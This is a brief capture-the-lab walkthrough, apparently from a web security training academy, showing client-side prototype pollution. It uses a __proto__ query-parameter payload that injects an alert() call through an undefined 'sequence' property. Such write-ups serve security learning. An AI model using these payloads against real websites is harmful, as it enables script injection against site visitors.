Imagine we have this website

Let’s test for prototype pollution

<https://0a2b0021030c824b81523e2300550023.web-security-academy.net/?__proto__.evil=remo>

notice that we Polluted the Prototype

now let’s find the Javascript in the website.

notice that sequence function is not defined so we can pollute it and add alert() function.

Now let’s exploit the lab

<https://0a2b0021030c824b81523e2300550023.web-security-academy.net/?__proto__.sequence=alert(%22Uzumaki%20Remo%22)->